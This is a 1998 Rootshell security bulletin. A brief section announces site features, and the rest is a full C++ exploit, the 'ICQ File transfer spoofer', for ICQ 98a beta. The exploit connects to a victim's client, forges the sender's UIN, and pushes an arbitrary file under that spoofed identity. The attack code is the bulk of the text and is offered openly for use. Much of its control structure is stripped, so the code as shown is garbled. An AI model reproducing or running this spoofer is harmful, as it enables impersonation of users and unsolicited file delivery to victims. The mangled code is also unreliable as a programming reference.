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[rootshell] Security Bulletin #21

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Date: 9 Jul 1998 00:05:49 -0000
Subject: [rootshell] Security Bulletin #21
Cc: recipient list not shown: ;
Security Bulletin #21
July 8th, 1998

[ ]


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01. New Rootshell Features
02. ICQ Version 98a beta DLL v1.07 File Transfer Spoofer

01. New Rootshell Features

If you have visited the Rootshell site recently you would have noticed some
major features have been added.  All exploits in our database now allow
users to post questions/comments/whatever.  This should allow for a much
more interactive experience.  If you have questions about getting programs
to work please post them in the comments area instead of e-mailing them to
me.  I do not have time to help every person compile such and such a program
with their broken compiler.  All exploits are now shown via an HTML page. 
This should help people who had problems with the various mime types
returned for different types of files.  You can still click on "Download
NON-HTML Version" to get the original file.

Another new feature has been added to Rootshell which allows you to check if
all of the file shares on your computer are password protected.  A page will
come up showing all available shares on your computer and a directory
listing of those which do not have any passwords.  A surprisingly large
number of computers have unpassworded file shares.  You *MUST* access this
page from the computer you wish to check.

As always please keep those suggestions coming!

-Kit <>

02. ICQ Version 98a beta DLL v1.07 File Transfer Spoofer

Date: Wed, 8 Jul 1998 16:46:11 -0700 (PDT)
From: Eric Hanson <>
Subject: icq file spoofer
Here's an original exploit submission.  We've had it for a month or so, and
told the former mirabilis about it, but (unsuprisingly) got no response, so
here you go.

-- cut here --

/* ICQ File transfer spoofer v.0001 - [ ]
 * by Eric Hanson (, Sam Fortiner (,
 * Hans Buchheim (, and Richard Patchett
 * (
 * This is our first attempt at anything icq related.  It's messy, but it
 * works.
 * Known bugs:
 *   - Doesn't support speed changes (crashes)
 *   - Doesn't work quite right with the Java client
 * Tested with:
 *   - Slackware Linux 2.0.30
 *   - ICQ Version 98a beta, DLL v1.07
 * Copyright (c) 1998

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <iostream.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <string.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/types.h>

#define VERSION htons(0x0300)
#define COMMAND_SENDFILE htons(0xee07)

class ICQPacket
 /* Packet 2 Header */
 __u32 SourceUIN;
 __u16 ICQVersion;
 __u32 Command;
 __u16 CommentLength;
 __u32 SenderIP;
 __u16 SenderPort;
 __u32 Unknown1b;
 __u32 Unknown2b;
 __u32 FileNameLength;
 __u8  Unknown4b;
 __u32 FileSize;
 __u32 Unknown1c;
 __u32 Unknown2c; /* Sender status ?*/
 __u16 FirstHeaderSize = 0x1a;
 __u16 SecondHeaderSize;

 __u16 DestinationPort;

 char header[] =
  {0xff, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
 char header2[] =
  {0x04, 0x00, 0x00};
 char intPad[] = {0x00, 0x00, 0x00, 0x00};
 char shortPad[] = {0x00, 0x00};
 char charPad[] = {0x00};

 char fileName[1024];
 char comment[1024];

 void exchangeName( int sock );
 void writePacket( int sock );
 void readResponse( int sock, ICQPacket* pPkt );
 void readNameExchange( int sock, ICQPacket* pPkt );
 void sendFilePreamble( int sock );
 void readFilePreamble (int sock);
 void sendFile( int sock );

void ICQPacket::writePacket(int sock)
 char buffer[65537];
 int offset = 0;

 memcpy(buffer, header, 9);
 offset += 9;
 memcpy(buffer + offset, &SourceUIN, sizeof(__u32));
 offset += sizeof(__u32);
 memcpy(buffer + offset, &SenderIP, sizeof(__u32));
 offset += sizeof(__u32);
 memcpy(buffer + offset, &SenderIP, sizeof(__u32));
 offset += sizeof(__u32);
 memcpy(buffer + offset, &SenderPort, sizeof(__u16));
 offset += sizeof(__u16);
 memcpy(buffer + offset, &header2, 3);
 offset += 3;

 offset += sizeof(__u16);

 memcpy(buffer + offset, &SourceUIN, sizeof(__u32));
 offset += sizeof(__u32);
 memcpy(buffer + offset, &ICQVersion, sizeof(__u16));
 offset += sizeof(__u16);
 memcpy(buffer + offset, &Command, sizeof(__u32));
 offset += sizeof(__u32);
 memcpy(buffer + offset, &SourceUIN, sizeof(__u32));
 offset += sizeof(__u32);
 memcpy(buffer + offset, &ICQVersion, sizeof(__u16));
 offset += sizeof(__u16);
 memcpy(buffer + offset, &CommentLength, sizeof(__u16));
 offset += sizeof(__u16);

 memcpy(buffer + offset, comment, strlen(comment));
 offset += strlen(comment);
 buffer[offset++] = 0x0;

 memcpy(buffer + offset, &SenderIP, sizeof(__u32));
 offset += sizeof(__u32);
 memcpy(buffer + offset, &SenderIP, sizeof(__u32));
 offset += sizeof(__u32);
 memcpy(buffer + offset, &SenderPort, sizeof(__u16));
 offset += sizeof(__u16);
 memcpy(buffer + offset, &Unknown1b, sizeof(__u32));
 offset += sizeof(__u32);
 memcpy(buffer + offset, &Unknown2b, sizeof(__u32));
 offset += sizeof(__u32);
 memcpy(buffer + offset, &FileNameLength, sizeof(__u32));
 offset += sizeof(__u32);
 memcpy(buffer + offset, &Unknown4b, sizeof(__u8));
 offset += sizeof(__u8);

 memcpy(buffer + offset, fileName, strlen(fileName));
 offset += strlen(fileName);
 buffer[offset++] = 0x0;

 memcpy(buffer + offset, &FileSize, sizeof(__u32));
 offset += sizeof(__u32);
 memcpy(buffer + offset, &Unknown1c, sizeof(__u32));
 offset += sizeof(__u32);
 memcpy(buffer + offset, &Unknown2c, sizeof(__u32));
 offset += sizeof(__u32);

 SecondHeaderSize = offset - FirstHeaderSize - 2;
 memcpy(buffer + 0x1a, &SecondHeaderSize, sizeof(__u16));

 write(sock, (void const *)&FirstHeaderSize, sizeof(__u16));

 write(sock, (void const *)buffer, offset);


void ICQPacket::exchangeName( int sock )
 char local_header[] = {0xff, 0x03, 0x00, 0x00, 0x00};
 char local_header2[] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,
 char local_header3[] = {0x64, 0x00, 0x00, 0x00};

 // local_header3 is the speed in percent (0 - 100)
 // bytes 6 thru 9 of local_header2 is the number of files to send.

 char buffer[65537];
 int offset = 0;

 FirstHeaderSize = 0x1a;

 memcpy(buffer, &local_header, 5);
 offset += 5;
 SenderPort --;
 memcpy(buffer + offset, &SenderPort, sizeof(__u16));

 offset += sizeof(__u16);
 offset += 2; // skip over 0x00, 0x00

 memcpy(buffer + offset, &SourceUIN, sizeof(__u32));
 offset += sizeof(__u32);
 memcpy(buffer + offset, &SenderIP, sizeof(__u32));
 offset += sizeof(__u32);
 memcpy(buffer + offset, &SenderIP, sizeof(__u32));
 offset += sizeof(__u32);
 memcpy(buffer + offset, &SenderPort, sizeof(__u16));
 offset += sizeof(__u16);
 memcpy(buffer + offset, &header2, 3);
 offset += 3;

 SenderPort ++; // set senderport back to actual port

 offset += 2;  // skip over rest of file length.

 memcpy(buffer + offset, &local_header2, 9);
 offset += 9;
 memcpy(buffer + offset, &FileSize, sizeof(__u32));
 offset += sizeof(__u32);
 memcpy(buffer + offset, &local_header3, 4);
 offset += 4;

 // make username equal to UIN
 char userName[1024];
 __u16 userNameLength;
 sprintf(userName, "%i", SourceUIN);
 userNameLength = strlen(userName);

 memcpy(buffer + offset, &userNameLength, sizeof(__u16));
 offset += sizeof(__u16);
 memcpy(buffer + offset, &userName, userNameLength);
 offset += userNameLength;
 buffer[offset++] = 0x0;

 SecondHeaderSize = offset - FirstHeaderSize - 2;
 memcpy(buffer + 0x1a, &SecondHeaderSize, sizeof(__u16));

 write(sock, (void const *)&FirstHeaderSize, sizeof(__u16));

 write(sock, (void const *)buffer, offset);


/* Set up fileName, fileSize,
 * */
void ICQPacket::sendFilePreamble( int sock )
 char local_header[] = {0x02, 0x00};
 char local_header2[] = {0x01, 0x00, 0x00}; // file number?
 char buffer[65537];
 __u32 offset = 0, speed = 100, fileNameLength = strlen(fileName) + 1;
 __u32 Unknown1 = 0x0;

 memcpy(buffer + offset, &local_header, 2);
 offset += 2;
 memcpy(buffer + offset, &fileNameLength, sizeof(__u16));
 offset += sizeof(__u16);
 memcpy(buffer + offset, &fileName, fileNameLength - 1);
 offset += fileNameLength - 1;
 buffer[offset++] = 0x0;
 memcpy (buffer+offset, local_header2, 3);
 offset += 3;
 memcpy(buffer + offset, &FileSize, sizeof(__u32));
 offset += sizeof(__u32);
 memcpy(buffer + offset, &Unknown1, sizeof(__u32));
 offset += sizeof(__u32);
 memcpy(buffer + offset, &speed, sizeof(__u32));
 offset += sizeof(__u32);

 __u16 nextPacketSize = (__u16)offset;
 write(sock, (void*)&nextPacketSize, sizeof(__u16));
 write(sock, (void*)buffer, nextPacketSize);


void ICQPacket::readNameExchange( int sock, ICQPacket* pPkt )
 __u16 nextPacketSize;
 int offset = 0;
 int connectionSpeed = 0;
 char constant;

 read(sock, (void*)&nextPacketSize, sizeof(__u16));

 char *buffer = new char[nextPacketSize];
  read(sock, (void*)buffer, nextPacketSize);

  memcpy(&constant, buffer + offset, 1);
  offset += 1;

  memcpy(&connectionSpeed, buffer + offset, sizeof(__u32));
  offset += sizeof(__u32);
  memcpy(&pPkt->CommentLength, buffer + offset, sizeof(__u16));
  offset += sizeof(__u16);
  memcpy(&pPkt->comment, buffer + offset, pPkt->CommentLength);
  offset += pPkt->CommentLength;
  pPkt->comment[pPkt->CommentLength] = 0x0;

  printf("Sending file to %s:", pPkt->comment);

  delete buffer;
   printf("Error allocating buffer in readNameExchange.\n");

void ICQPacket::readFilePreamble (int sock)
 __u16 nextPacketSize;
 __u32 unknown1, unknown2;
 int offset = 0;
 int connectionSpeed = 0;
 char constant;

 read(sock, (void*)&nextPacketSize, sizeof(__u16));

 char *buffer = new char[nextPacketSize];
  read(sock, (void*)buffer, nextPacketSize);

  memcpy(&constant, buffer + offset, 1);
  offset += 1;

  memcpy(&unknown1, buffer + offset, sizeof(__u32));
  offset += sizeof(__u32);
  memcpy(&unknown2, buffer + offset, sizeof(__u32));
  offset += sizeof(__u16);
  memcpy(&connectionSpeed, buffer + offset, sizeof(__u32));
  offset += sizeof(__u32);

  delete buffer;
  printf("Error allocating buffer in readNameExchange.\n");


void ICQPacket::sendFile( int sock )
 char *fileBuffer = new char[FileSize];
 unsigned char constant = 0x06;
 int remainingBytes = FileSize, offset = 0;
 __u16 nextPacketSize;

 if( fileBuffer )
  int fd = open( fileName, O_RDONLY);
  if ( fd == -1 )
   perror("open in sendFile");
   int status = read( fd, fileBuffer, FileSize );
   if( status == -1 )
    perror("read in sendfile");
    int firstPacket = 1;
     char b[2051];
     __u16 temp;

     if(remainingBytes < 2048)
      nextPacketSize = remainingBytes;
      nextPacketSize = 2048;

     if( firstPacket )
      firstPacket = 0;
      temp = nextPacketSize + 1;
      write(sock, &temp, sizeof(__u16));
      b[0] = constant;
      memcpy(&b[1], fileBuffer + offset, nextPacketSize);
      offset += nextPacketSize;
      remainingBytes -= nextPacketSize;
      write(sock, b, nextPacketSize + 1);
      temp = nextPacketSize + 1;
      memcpy(b, &temp, sizeof(__u16));
      b[2] = constant;
      memcpy(&b[3], fileBuffer + offset, nextPacketSize);
      offset += nextPacketSize;
      remainingBytes -= nextPacketSize;
      write(sock, b, nextPacketSize + 3);
    } while ( remainingBytes );

    printf("\nFile sent.\n");

  delete fileBuffer;
  printf("Error allocating memory for fileBuffer in sendFile.\n");

void ICQPacket::readResponse( int sock, ICQPacket* pPkt )
 __u16 nextPacketSize;
 int offset = 0;

 read(sock, (void *)&nextPacketSize, sizeof(__u16));

 char *buf = new char[nextPacketSize];
 if(buf) {
  __u32 reject;

  read(sock, (void *)buf, nextPacketSize);

  memcpy(&pPkt->SourceUIN, &buf[offset], sizeof(__u32));
  offset += sizeof(__u32);
  memcpy(&pPkt->ICQVersion, &buf[offset], sizeof(__u16));
  offset += sizeof(__u16);
  if(pPkt->ICQVersion != VERSION)
   printf("Version differences:  target 0x%x, actual 0x%x.\n", VERSION,
  memcpy(&pPkt->Command, &buf[offset], sizeof(__u32));
  offset += sizeof(__u32);
  offset += sizeof(__u32); // skip over the 2nd UIN
  offset += sizeof(__u16); // skip over the 2nd version
  memcpy(&pPkt->CommentLength, &buf[offset], sizeof(__u16));
  offset += sizeof(__u16);
  memcpy(&pPkt->comment, &buf[offset], pPkt->CommentLength);
  offset += pPkt->CommentLength;

  memcpy(&pPkt->SenderIP, &buf[offset], sizeof(__u32));
  offset += sizeof(__u32);
  offset += sizeof(__u32); // skip over 2nd IP
  memcpy(&pPkt->SenderPort, &buf[offset], sizeof(__u16));
  offset += sizeof(__u16);
  offset += 3; // skip junk 0x00, 0x00, 0x04
  memcpy(&reject, &buf[offset], sizeof(__u32));
  offset += sizeof(__u32);

   printf("Connection accepted.\n");
   printf("Connection REJECTED.\n");
   printf("Comment: %s\n", pPkt->comment);

  offset += sizeof(__u16); // skip over dest port

  offset += sizeof(__u16); // skip 2 bytes 0x00, 0x00

  memcpy(&pPkt->FileNameLength, &buf[offset], sizeof(__u16));
  offset += sizeof(__u16);

  memcpy(&pPkt->fileName, &buf[offset], pPkt->FileNameLength);
  offset += pPkt->FileNameLength;

  offset += sizeof(__u32); // skip 4 bytes 0x00, 0x00, 0x00, 0x00

  memcpy(&pPkt->DestinationPort, &buf[offset], sizeof(__u16));
  offset += sizeof(__u16);

  delete buf;

 else {
  printf("Error allocating memory.\n");

int main(int argc, char *argv[])
  struct sockaddr_in sin, sout, sin2, sout2;
 struct stat st;

 char fileName[1024], comment[1024];

 comment[0] = 0;

 int sock, x;
 int nameSize;
 int fileSize;
 int sock2;

  if (argc != 6)
  printf(" ICQ File Spoofer\n");
  printf("usage: %s ip port SpoofedUIN file \"comment\"\n", argv[0]);
  return (0);

 strcpy(fileName, argv[4]);
 if( stat(fileName, &st) != -1)
    fileSize = st.st_size;
 strcpy(comment, argv[5]);

 /* make a socket */
 if (!(sock = socket(AF_INET, SOCK_STREAM, 0))) {
  return (0);

 /* set some stuff up */
 sin.sin_family = AF_INET;
 sin.sin_addr.s_addr = inet_addr(argv[1]);
 sin.sin_port = htons(atol(argv[2]));

 /* connect to the victim */
 if (connect(sock, (struct sockaddr*)&sin,sizeof(sin))==-1) {
  return (0);

 nameSize = sizeof(sockaddr);
 getsockname(sock, (struct sockaddr*)&sout, &nameSize);

 /* make our payload */
 x = -1;

 ICQPacket pkt, pkt2, pkt3;

  pkt.SourceUIN = atoi(argv[3]);
 pkt.ICQVersion = VERSION;
 pkt.Command = COMMAND_SENDFILE;
 pkt.CommentLength = strlen(comment) + 1;

 pkt.Unknown1b = 0x00040000;
 pkt.Unknown2b = 0x00001000;
 pkt.FileNameLength = htonl(strlen(fileName) + 1);

 pkt.Unknown4b = 0x00;

 pkt.FileSize = fileSize;
 pkt.Unknown1c = 0x0000;
 pkt.Unknown2c = 0xFFFFFFA0;

 strcpy(pkt.fileName, fileName);
 strcpy(pkt.comment, comment);

 printf("Waiting for acceptance.\n");
 pkt.readResponse(sock, &pkt2);

  /* make a socket */
 if (!(sock2 = socket(AF_INET, SOCK_STREAM, 0))) {
  return (0);

 /* set some stuff up */
 sin2.sin_family = AF_INET;
 sin2.sin_addr.s_addr = inet_addr(argv[1]);
 sin2.sin_port = htons(pkt2.DestinationPort);

 /* connect to the victim */
 if (connect(sock2, (struct sockaddr*)&sin2,sizeof(sin2))==-1) {
  return (0);

 nameSize = sizeof(sockaddr);
 getsockname(sock2, (struct sockaddr*)&sout2, &nameSize);

 pkt3.SenderIP = sout2.sin_addr.s_addr;
 pkt3.SenderPort = ntohs( sout2.sin_port );
 pkt3.SourceUIN = atoi(argv[3]);
 pkt3.FileSize = fileSize;

 pkt3.exchangeName( sock2 );

 pkt3.readNameExchange( sock2, &pkt2 );

 pkt3.FileSize = fileSize;
 strcpy(pkt3.fileName, fileName);
 pkt3.sendFilePreamble( sock2 );

 pkt3.readFilePreamble( sock2 );

 pkt3.sendFile ( sock2 );


  return (0);

-- cut here --


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